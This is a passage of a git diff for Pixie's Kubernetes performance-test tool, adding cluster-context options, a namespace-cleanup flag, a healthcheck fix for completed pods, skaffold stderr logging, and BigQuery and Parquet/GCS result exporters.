interface{}) bool { return false } } + if this.KubeconfigPath != that1.KubeconfigPath { + return false + } + if this.KubeContext != that1.KubeContext { + return false + } + if this.Name != that1.Name { + return false + } return true } func (this *ClusterSpec) Equal(that interface{}) bool { @@ -2819,12 +2868,13 @@ func (this *PrerenderedDeploy) GoString() string { if this == nil { return "nil" } - s := make([]string, 0, 6) + s := make([]string, 0, 7) s = append(s, "&experimentpb.PrerenderedDeploy{") s = append(s, "YAMLPaths: "+fmt.Sprintf("%#v", this.YAMLPaths)+",\n") if this.Patches != nil { s = append(s, "Patches: "+fmt.Sprintf("%#v", this.Patches)+",\n") } + s = append(s, "SkipNamespaceDelete: "+fmt.Sprintf("%#v", this.SkipNamespaceDelete)+",\n") s = append(s, "}") return strings.Join(s, "") } @@ -2995,7 +3045,7 @@ func (this *PrometheusScrapeSpec) GoString() string { if this == nil { return "nil" } - s := make([]string, 0, 10) + s := make([]string, 0, 13) s = append(s, "&experimentpb.PrometheusScrapeSpec{") s = append(s, "Namespace: "+fmt.Sprintf("%#v", this.Namespace)+",\n") s = append(s, "MatchLabelKey: "+fmt.Sprintf("%#v", this.MatchLabelKey)+",\n") @@ -3017,6 +3067,9 @@ func (this *PrometheusScrapeSpec) GoString() string { if this.MetricNames != nil { s = append(s, "MetricNames: "+mapStringForMetricNames+",\n") } + s = append(s, "KubeconfigPath: "+fmt.Sprintf("%#v", this.KubeconfigPath)+",\n") + s = append(s, "KubeContext: "+fmt.Sprintf("%#v", this.KubeContext)+",\n") + s = append(s, "Name: "+fmt.Sprintf("%#v", this.Name)+",\n") s = append(s, "}") return strings.Join(s, "") } @@ -3615,6 +3668,16 @@ func (m *PrerenderedDeploy) MarshalToSizedBuffer(dAtA []byte) (int, error) { _ = i var l int _ = l + if m.SkipNamespaceDelete { + i-- + if m.SkipNamespaceDelete { + dAtA[i] = 1 + } else { + dAtA[i] = 0 + } + i-- + dAtA[i] = 0x18 + } if len(m.Patches) > 0 { for iNdEx := len(m.Patches) - 1; iNdEx >= 0; iNdEx-- { { @@ -4165,6 +4228,27 @@ func (m *PrometheusScrapeSpec) MarshalToSizedBuffer(dAtA []byte) (int, error) { _ = i var l int _ = l + if len(m.Name) > 0 { + i -= len(m.Name) + copy(dAtA[i:], m.Name) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.Name))) + i-- + dAtA[i] = 0x4a + } + if 
len(m.KubeContext) > 0 { + i -= len(m.KubeContext) + copy(dAtA[i:], m.KubeContext) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.KubeContext))) + i-- + dAtA[i] = 0x42 + } + if len(m.KubeconfigPath) > 0 { + i -= len(m.KubeconfigPath) + copy(dAtA[i:], m.KubeconfigPath) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.KubeconfigPath))) + i-- + dAtA[i] = 0x3a + } if len(m.MetricNames) > 0 { for k := range m.MetricNames { v := m.MetricNames[k] @@ -4648,6 +4732,9 @@ func (m *PrerenderedDeploy) Size() (n int) { n += 1 + l + sovExperiment(uint64(l)) } } + if m.SkipNamespaceDelete { + n += 2 + } return n } @@ -4917,6 +5004,18 @@ func (m *PrometheusScrapeSpec) Size() (n int) { n += mapEntrySize + 1 + sovExperiment(uint64(mapEntrySize)) } } + l = len(m.KubeconfigPath) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } + l = len(m.KubeContext) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } + l = len(m.Name) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } return n } @@ -5169,6 +5268,7 @@ func (this *PrerenderedDeploy) String() string { s := strings.Join([]string{`&PrerenderedDeploy{`, `YAMLPaths:` + fmt.Sprintf("%v", this.YAMLPaths) + `,`, `Patches:` + repeatedStringForPatches + `,`, + `SkipNamespaceDelete:` + fmt.Sprintf("%v", this.SkipNamespaceDelete) + `,`, `}`, }, "") return s @@ -5359,6 +5459,9 @@ func (this *PrometheusScrapeSpec) String() string { `Port:` + fmt.Sprintf("%v", this.Port) + `,`, `ScrapePeriod:` + strings.Replace(fmt.Sprintf("%v", this.ScrapePeriod), "Duration", "types.Duration", 1) + `,`, `MetricNames:` + mapStringForMetricNames + `,`, + `KubeconfigPath:` + fmt.Sprintf("%v", this.KubeconfigPath) + `,`, + `KubeContext:` + fmt.Sprintf("%v", this.KubeContext) + `,`, + `Name:` + fmt.Sprintf("%v", this.Name) + `,`, `}`, }, "") return s @@ -6849,6 +6952,26 @@ func (m *PrerenderedDeploy) Unmarshal(dAtA []byte) error { return err } iNdEx = postIndex + case 3: + if wireType != 0 { + return fmt.Errorf("proto: wrong wireType = %d for field SkipNamespaceDelete", wireType) + } + var v int + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + v |= int(b&0x7F) << shift + if b < 0x80 { + break + } + } + m.SkipNamespaceDelete = bool(v != 0) default: iNdEx = preIndex skippy, err := skipExperiment(dAtA[iNdEx:]) @@ -8569,6 +8692,102 @@ func (m *PrometheusScrapeSpec) Unmarshal(dAtA []byte) error { } m.MetricNames[mapkey] = mapvalue iNdEx = postIndex + case 7: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field KubeconfigPath", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.KubeconfigPath = string(dAtA[iNdEx:postIndex]) + iNdEx = postIndex + case 8: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field KubeContext", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + 
iNdEx++
+				stringLen |= uint64(b&0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			intStringLen := int(stringLen)
+			if intStringLen < 0 {
+				return ErrInvalidLengthExperiment
+			}
+			postIndex := iNdEx + intStringLen
+			if postIndex < 0 {
+				return ErrInvalidLengthExperiment
+			}
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.KubeContext = string(dAtA[iNdEx:postIndex])
+			iNdEx = postIndex
+		case 9:
+			if wireType != 2 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Name", wireType)
+			}
+			var stringLen uint64
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowExperiment
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				stringLen |= uint64(b&0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			intStringLen := int(stringLen)
+			if intStringLen < 0 {
+				return ErrInvalidLengthExperiment
+			}
+			postIndex := iNdEx + intStringLen
+			if postIndex < 0 {
+				return ErrInvalidLengthExperiment
+			}
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.Name = string(dAtA[iNdEx:postIndex])
+			iNdEx = postIndex
 		default:
 			iNdEx = preIndex
 			skippy, err := skipExperiment(dAtA[iNdEx:])
diff --git a/src/e2e_test/perf_tool/experimentpb/experiment.proto b/src/e2e_test/perf_tool/experimentpb/experiment.proto
index d5482d5d249..ed9dce28339 100644
--- a/src/e2e_test/perf_tool/experimentpb/experiment.proto
+++ b/src/e2e_test/perf_tool/experimentpb/experiment.proto
@@ -124,6 +124,11 @@ message PatchTarget {
 message PrerenderedDeploy {
   repeated string yaml_paths = 1 [ (gogoproto.customname) = "YAMLPaths" ];
   repeated PatchSpec patches = 2;
+  // If true, the step will not return the deployed namespace in its cleanup list,
+  // so workload.Close() will not delete that namespace on teardown. Use this for
+  // resources applied into namespaces the experiment does not own (e.g. a
+  // RoleBinding in kube-system that has to live there for API aggregation auth).
+  bool skip_namespace_delete = 3;
 }
 
 // SkaffoldDeploy specifies how to use skaffold to deploy a component. SkaffoldDeploy is currently
@@ -220,6 +225,15 @@ message PrometheusScrapeSpec {
   // How often to scrape the matched pods.
   google.protobuf.Duration scrape_period = 5;
   map<string, string> metric_names = 6;
+  // Optional path to a kubeconfig file for connecting to a different cluster.
+  // If empty, the experiment's default cluster context is used.
+  string kubeconfig_path = 7;
+  // Optional kubectl context name to use within the kubeconfig.
+  // If empty, the current-context from the kubeconfig is used.
+  string kube_context = 8;
+  // Identifier for this prometheus recorder, used by the CLI to target
+  // recorders with kubeconfig/kube_context overrides at runtime.
+  string name = 9;
 }
 
 // ClusterSpec specifies the type and size of cluster an experiment should run on.
diff --git a/src/e2e_test/perf_tool/pkg/cluster/context.go b/src/e2e_test/perf_tool/pkg/cluster/context.go
index bd79bf433f3..c274a6726b0 100644
--- a/src/e2e_test/perf_tool/pkg/cluster/context.go
+++ b/src/e2e_test/perf_tool/pkg/cluster/context.go
@@ -53,6 +53,36 @@ func NewContextFromPath(kubeconfigPath string) (*Context, error) {
 	}, nil
 }
 
+// NewContextFromOptions creates a new Context using the specified kubeconfig path and/or context name.
+// If kubeconfigPath is empty, the default kubeconfig path is used.
+// If kubeContext is empty, the current-context from the kubeconfig is used.
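+// Both overrides may be combined. For example (illustrative values),
+//   ctx, err := cluster.NewContextFromOptions("/tmp/soc-kubeconfig", "soc-cluster")
+// resolves the "soc-cluster" context inside that file, while an empty path falls
+// back to clientcmd's default loading chain ($KUBECONFIG, then ~/.kube/config).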
+func NewContextFromOptions(kubeconfigPath string, kubeContext string) (*Context, error) { + loadingRules := &clientcmd.ClientConfigLoadingRules{} + if kubeconfigPath != "" { + loadingRules.ExplicitPath = kubeconfigPath + } else { + loadingRules = clientcmd.NewDefaultClientConfigLoadingRules() + } + overrides := &clientcmd.ConfigOverrides{} + if kubeContext != "" { + overrides.CurrentContext = kubeContext + } + config := clientcmd.NewNonInteractiveDeferredLoadingClientConfig(loadingRules, overrides) + restConfig, err := config.ClientConfig() + if err != nil { + return nil, err + } + if kubeconfigPath == "" { + kubeconfigPath = clientcmd.RecommendedHomeFile + } + clientset := k8s.GetClientset(restConfig) + return &Context{ + configPath: kubeconfigPath, + restConfig: restConfig, + clientset: clientset, + }, nil +} + // NewContextFromConfig writes the given kubeconfig to a file, and the returns NewContextFromPath for that file. func NewContextFromConfig(kubeconfig []byte) (*Context, error) { tmpFile, err := os.CreateTemp("", "*") diff --git a/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel b/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel index 22c706e9bee..a4205b00b8c 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel @@ -34,6 +34,7 @@ go_library( "//src/e2e_test/perf_tool/pkg/pixie", "@com_github_cenkalti_backoff_v4//:backoff", "@com_github_sirupsen_logrus//:logrus", + "@io_k8s_api//core/v1:core", "@io_k8s_apimachinery//pkg/apis/meta/v1:meta", ], ) diff --git a/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go b/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go index fda494dc839..08363f43abe 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go +++ b/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go @@ -25,6 +25,7 @@ import ( "github.com/cenkalti/backoff/v4" log "github.com/sirupsen/logrus" + v1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" @@ -68,6 +69,15 @@ func (hc *k8sHealthCheck) Wait(ctx context.Context, clusterCtx *cluster.Context, ) } for _, pod := range pl.Items { + // CronJob pods that exited 0 stay around in phase Succeeded + // (Kubernetes keeps them per successfulJobsHistoryLimit) and + // their containers report Ready: false forever. They are + // "done", not "not ready" — skip. Phase Failed is intentionally + // NOT skipped: a failed CronJob run is a real signal we want + // the healthcheck to surface, not paper over. 
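+		// (kubectl shows these pods as "Completed"; with the Kubernetes default
+		// successfulJobsHistoryLimit of 3, up to three of them can linger per CronJob.)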
+ if pod.Status.Phase == v1.PodSucceeded { + continue + } for _, cs := range pod.Status.InitContainerStatuses { if cs.State.Terminated == nil { return fmt.Errorf( diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go b/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go index a05960b6de2..ca7dbf6ef3e 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go @@ -75,6 +75,9 @@ func (p *prerenderedDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, e if err := p.r.deploy(clusterCtx); err != nil { return nil, err } + if p.spec.SkipNamespaceDelete { + return nil, nil + } ns, err := p.r.getNamespace() if err != nil { return nil, err diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/px.go b/src/e2e_test/perf_tool/pkg/deploy/steps/px.go index 5aedff51f92..c290369dff6 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/px.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/px.go @@ -20,9 +20,11 @@ package steps import ( "fmt" + "os" "strings" "github.com/gofrs/uuid" + log "github.com/sirupsen/logrus" "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" @@ -74,20 +76,43 @@ func (px *pxDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, error) { if hasElem(args, "deploy") && !hasElem(args, "-y") { args = append(args, "-y") } - if _, err := px.pxCtx.RunPXCmd(clusterCtx, args...); err != nil { - return nil, err - } - if px.spec.SetClusterID { - clusterIDBytes, err := px.pxCtx.RunPXCmd(clusterCtx, "get", "cluster", "--id") - if err != nil { + // Empty Args is used by callers that only want SetClusterID against a + // pre-existing Pixie deployment (e.g. the SOC_VIZIER_EXISTING path in + // the sovereign-soc suite). Skip the bare `px` invocation in that case + // — it would otherwise just print help and clutter the trace log. + if len(args) > 0 { + if _, err := px.pxCtx.RunPXCmd(clusterCtx, args...); err != nil { return nil, err } - clusterIDStr := strings.Trim(string(clusterIDBytes), " \n") - id, err := uuid.FromString(clusterIDStr) - if err != nil { - return nil, err + } + if px.spec.SetClusterID { + // Allow a direct UUID override via env. Useful when the px CLI + // in this runner has no cluster selected and `px get cluster --id` + // would otherwise return empty or a stale row. + if override := strings.TrimSpace(os.Getenv("SOC_VIZIER_CLUSTER_ID")); override != "" { + id, err := uuid.FromString(override) + if err != nil { + return nil, fmt.Errorf("SOC_VIZIER_CLUSTER_ID %q is not a valid UUID: %w", override, err) + } + log.WithField("source", "env").WithField("cluster_id", id.String()).Info("Binding existing Vizier cluster ID") + px.pxCtx.SetClusterID(id) + } else { + clusterIDBytes, err := px.pxCtx.RunPXCmd(clusterCtx, "get", "cluster", "--id") + if err != nil { + return nil, fmt.Errorf("px get cluster --id failed: %w", err) + } + clusterIDStr := strings.Trim(string(clusterIDBytes), " \n") + log.WithField("source", "px get cluster --id").WithField("raw", clusterIDStr).Info("Resolving existing Vizier cluster ID") + id, err := uuid.FromString(clusterIDStr) + if err != nil { + return nil, fmt.Errorf("px get cluster --id returned %q which is not a UUID: %w", clusterIDStr, err) + } + if (id == uuid.UUID{}) { + return nil, fmt.Errorf("px get cluster --id returned the zero UUID; the cluster is not registered (or the px CLI has no cluster selected). 
Set SOC_VIZIER_CLUSTER_ID to override") + } + log.WithField("cluster_id", id.String()).Info("Binding existing Vizier cluster ID") + px.pxCtx.SetClusterID(id) } - px.pxCtx.SetClusterID(id) } // We don't know what namespaces a given `px` command will create, so we rely on the user to set them in the spec. return px.spec.Namespaces, nil diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go b/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go index edbac73a2ef..3216d73d009 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go @@ -21,6 +21,7 @@ package steps import ( "bytes" "fmt" + "io" "os" "os/exec" "strings" @@ -34,6 +35,7 @@ import ( type skaffoldDeployImpl struct { spec *experimentpb.SkaffoldDeploy containerRegistryRepo string + stderrFile string r *renderedYAML } @@ -41,10 +43,13 @@ type skaffoldDeployImpl struct { var _ DeployStep = &skaffoldDeployImpl{} // NewSkaffoldDeploy returns a new DeployStep which deploys a stage of a workload using skaffold. -func NewSkaffoldDeploy(spec *experimentpb.SkaffoldDeploy, containerRegistryRepo string) DeployStep { +// If stderrFile is non-empty, skaffold's stderr is appended to that file in addition to +// the perf_tool process's stderr. +func NewSkaffoldDeploy(spec *experimentpb.SkaffoldDeploy, containerRegistryRepo, stderrFile string) DeployStep { return &skaffoldDeployImpl{ spec: spec, containerRegistryRepo: containerRegistryRepo, + stderrFile: stderrFile, } } @@ -85,6 +90,21 @@ func (s *skaffoldDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, erro return []string{ns}, nil } +// stderrSink returns the io.Writer to use for skaffold's stderr and a cleanup +// func. When stderrFile is set, output is teed to both os.Stderr and the file +// (opened in append mode so multiple skaffold invocations all land in the same +// log). +func (s *skaffoldDeployImpl) stderrSink() (io.Writer, func(), error) { + if s.stderrFile == "" { + return os.Stderr, func() {}, nil + } + f, err := os.OpenFile(s.stderrFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return nil, nil, fmt.Errorf("failed to open skaffold stderr file %q: %w", s.stderrFile, err) + } + return io.MultiWriter(os.Stderr, f), func() { f.Close() }, nil +} + func (s *skaffoldDeployImpl) runSkaffoldBuild() ([]byte, error) { var buildArtifacts bytes.Buffer buildArgs := []string{ @@ -95,8 +115,13 @@ func (s *skaffoldDeployImpl) runSkaffoldBuild() ([]byte, error) { } buildArgs = append(buildArgs, s.spec.SkaffoldArgs...) log.Tracef("Running `skaffold %s` ...", strings.Join(buildArgs, " ")) + stderr, cleanup, err := s.stderrSink() + if err != nil { + return nil, err + } + defer cleanup() cmd := exec.Command("skaffold", buildArgs...) - cmd.Stderr = os.Stderr + cmd.Stderr = stderr cmd.Stdout = &buildArtifacts if err := cmd.Run(); err != nil { return nil, fmt.Errorf("failed to run `skaffold %s`: %w", strings.Join(buildArgs, " "), err) @@ -114,9 +139,14 @@ func (s *skaffoldDeployImpl) runSkaffoldRender(buildArtifacts []byte) ([]byte, e } renderArgs = append(renderArgs, s.spec.SkaffoldArgs...) log.Tracef("Running `skaffold %s` ...", strings.Join(renderArgs, " ")) + stderr, cleanup, err := s.stderrSink() + if err != nil { + return nil, err + } + defer cleanup() cmd := exec.Command("skaffold", renderArgs...) 
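+	// The artifact list produced by runSkaffoldBuild is handed to `skaffold render`
+	// on stdin (cmd.Stdin below), so that render can reuse the images already built
+	// above instead of triggering another build.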
cmd.Stdin = bytes.NewReader(buildArtifacts) - cmd.Stderr = os.Stderr + cmd.Stderr = stderr cmd.Stdout = &renderedYAMLs if err := cmd.Run(); err != nil { return nil, fmt.Errorf("failed to run `skaffold %s`: %w", strings.Join(renderArgs, " "), err) diff --git a/src/e2e_test/perf_tool/pkg/deploy/workload.go b/src/e2e_test/perf_tool/pkg/deploy/workload.go index ef1e1fc8170..9b09d28c619 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/workload.go +++ b/src/e2e_test/perf_tool/pkg/deploy/workload.go @@ -54,14 +54,17 @@ type workloadImpl struct { } // NewWorkload creates a new Workload capable of deploying according to the spec given. -func NewWorkload(pxCtx *pixie.Context, containerRegistryRepo string, spec *experimentpb.WorkloadSpec) (Workload, error) { +// skaffoldStderrFile, when non-empty, is the path to which skaffold's stderr is appended +// for any skaffold-based deploy steps; pass "" to leave skaffold's stderr going only to +// the perf_tool process's stderr. +func NewWorkload(pxCtx *pixie.Context, containerRegistryRepo, skaffoldStderrFile string, spec *experimentpb.WorkloadSpec) (Workload, error) { deploySteps := make([]steps.DeployStep, len(spec.DeploySteps)) for i, stepSpec := range spec.DeploySteps { switch stepSpec.DeployType.(type) { case *experimentpb.DeployStep_Prerendered: deploySteps[i] = steps.NewPrerenderedDeploy(stepSpec.GetPrerendered()) case *experimentpb.DeployStep_Skaffold: - deploySteps[i] = steps.NewSkaffoldDeploy(stepSpec.GetSkaffold(), containerRegistryRepo) + deploySteps[i] = steps.NewSkaffoldDeploy(stepSpec.GetSkaffold(), containerRegistryRepo, skaffoldStderrFile) case *experimentpb.DeployStep_Px: deploySteps[i] = steps.NewPxDeploy(pxCtx, stepSpec.GetPx()) } diff --git a/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel b/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel new file mode 100644 index 00000000000..a3e37f28f0c --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel @@ -0,0 +1,51 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "exporter", + srcs = [ + "bq_exporter.go", + "exporter.go", + "parquet_exporter.go", + "parquet_local_exporter.go", + ], + importpath = "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter", + visibility = ["//visibility:public"], + deps = [ + "//src/e2e_test/perf_tool/pkg/metrics", + "//src/shared/bq", + "@com_github_gofrs_uuid//:uuid", + "@com_github_parquet_go_parquet_go//:parquet-go", + "@com_github_sirupsen_logrus//:logrus", + "@com_google_cloud_go_storage//:storage", + ], +) + +pl_go_test( + name = "exporter_test", + srcs = ["parquet_exporter_test.go"], + embed = [":exporter"], + deps = [ + "//src/e2e_test/perf_tool/pkg/metrics", + "@com_github_gofrs_uuid//:uuid", + "@com_github_parquet_go_parquet_go//:parquet-go", + "@com_github_stretchr_testify//assert", + "@com_github_stretchr_testify//require", + ], +) diff --git a/src/e2e_test/perf_tool/pkg/run/row.go b/src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go similarity index 58% rename from src/e2e_test/perf_tool/pkg/run/row.go rename to src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go index 17959d97d78..023db03c4f4 100644 --- a/src/e2e_test/perf_tool/pkg/run/row.go +++ b/src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go @@ -16,15 +16,18 @@ * SPDX-License-Identifier: Apache-2.0 */ -package run +package exporter import ( + "context" "encoding/json" "time" "github.com/gofrs/uuid" + log "github.com/sirupsen/logrus" "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" + "px.dev/pixie/src/shared/bq" ) // ResultRow represents a single datapoint for a single metric, to be stored in bigquery. @@ -51,7 +54,7 @@ type SpecRow struct { CommitTopoOrder int `bigquery:"commit_topo_order"` } -// MetricsRowToResultRow converts a `metrics.ResultRow` into a `bq.ResultRow`. +// MetricsRowToResultRow converts a `metrics.ResultRow` into a `ResultRow`. func MetricsRowToResultRow(expID uuid.UUID, row *metrics.ResultRow) (*ResultRow, error) { encodedTags, err := json.Marshal(row.Tags) if err != nil { @@ -65,3 +68,61 @@ func MetricsRowToResultRow(expID uuid.UUID, row *metrics.ResultRow) (*ResultRow, Tags: string(encodedTags), }, nil } + +// BQExporter exports experiment results and specs to BigQuery. +type BQExporter struct { + resultTable *bq.Table + specTable *bq.Table +} + +// NewBQExporter creates a new BigQuery exporter. +func NewBQExporter(resultTable, specTable *bq.Table) *BQExporter { + return &BQExporter{ + resultTable: resultTable, + specTable: specTable, + } +} + +// ExportResults consumes metrics from resultCh and inserts them into BigQuery in batches. +func (e *BQExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error { + bqCh := make(chan interface{}) + defer close(bqCh) + + inserter := &bq.BatchInserter{ + Table: e.resultTable, + BatchSize: 512, + PushTimeout: 2 * time.Minute, + } + go inserter.Run(bqCh) + + for row := range resultCh { + bqRow, err := MetricsRowToResultRow(expID, row) + if err != nil { + log.WithError(err).Error("Failed to convert result row") + continue + } + bqCh <- bqRow + } + return nil +} + +// ExportSpec writes the experiment spec to BigQuery on experiment success. 
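+// The insert runs with SkipInvalidRows=false, so a row/schema mismatch fails the
+// export loudly instead of being dropped silently.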
+func (e *BQExporter) ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error { + specRow := &SpecRow{ + ExperimentID: expID.String(), + Spec: encodedSpec, + CommitTopoOrder: commitTopoOrder, + } + + inserter := e.specTable.Inserter() + inserter.SkipInvalidRows = false + + putCtx, cancel := context.WithTimeout(ctx, 5*time.Minute) + defer cancel() + return inserter.Put(putCtx, specRow) +} + +// Close is a no-op for the BigQuery exporter. +func (e *BQExporter) Close() error { + return nil +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/exporter.go b/src/e2e_test/perf_tool/pkg/exporter/exporter.go new file mode 100644 index 00000000000..c89d6898032 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/exporter.go @@ -0,0 +1,37 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + + "github.com/gofrs/uuid" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +// Exporter handles exporting experiment results and specs to a storage backend. +type Exporter interface { + // ExportResults consumes metrics from resultCh until it closes, then flushes. + ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error + // ExportSpec writes the experiment spec for a successful experiment. + ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error + // Close releases any resources held by the exporter. + Close() error +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go new file mode 100644 index 00000000000..c5fe259e93a --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go @@ -0,0 +1,285 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + "fmt" + "io" + "os" + "sort" + "time" + + "cloud.google.com/go/storage" + "github.com/gofrs/uuid" + "github.com/parquet-go/parquet-go" + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +type bufferedRow struct { + ExperimentID string + Timestamp time.Time + Name string + Value float64 + Tags map[string]string +} + +// uploadFunc is the signature for uploading a local file to a remote path. 
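+// It is held as a struct field (rather than being a method) so tests and
+// benchmarks can stub out the GCS round-trip; see parquet_exporter_test.go.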
+type uploadFunc func(ctx context.Context, objectPath string, localPath string) error + +// ParquetGCSExporter exports experiment results as parquet files to GCS. +type ParquetGCSExporter struct { + bucket string + prefix string + batchSize int + gcsClient *storage.Client + upload uploadFunc +} + +// NewParquetGCSExporter creates a new Parquet+GCS exporter. +func NewParquetGCSExporter(ctx context.Context, bucket, prefix string, batchSize int) (*ParquetGCSExporter, error) { + client, err := storage.NewClient(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create GCS client: %w", err) + } + e := &ParquetGCSExporter{ + bucket: bucket, + prefix: prefix, + batchSize: batchSize, + gcsClient: client, + } + e.upload = e.uploadToGCS + return e, nil +} + +// ExportResults consumes metrics from resultCh and writes them as batched parquet files to GCS. +func (e *ParquetGCSExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error { + now := time.Now() + basePath := e.gcsPath(now, expID) + seqNum := 0 + batch := make([]bufferedRow, 0, e.batchSize) + + for row := range resultCh { + batch = append(batch, bufferedRow{ + ExperimentID: expID.String(), + Timestamp: row.Timestamp, + Name: row.Name, + Value: row.Value, + Tags: row.Tags, + }) + if len(batch) >= e.batchSize { + if err := e.flushBatch(ctx, basePath, seqNum, batch); err != nil { + return err + } + seqNum++ + batch = batch[:0] + } + } + + if len(batch) > 0 { + if err := e.flushBatch(ctx, basePath, seqNum, batch); err != nil { + return err + } + } + return nil +} + +// ExportSpec writes the experiment spec as a parquet file to GCS. +func (e *ParquetGCSExporter) ExportSpec(ctx context.Context, 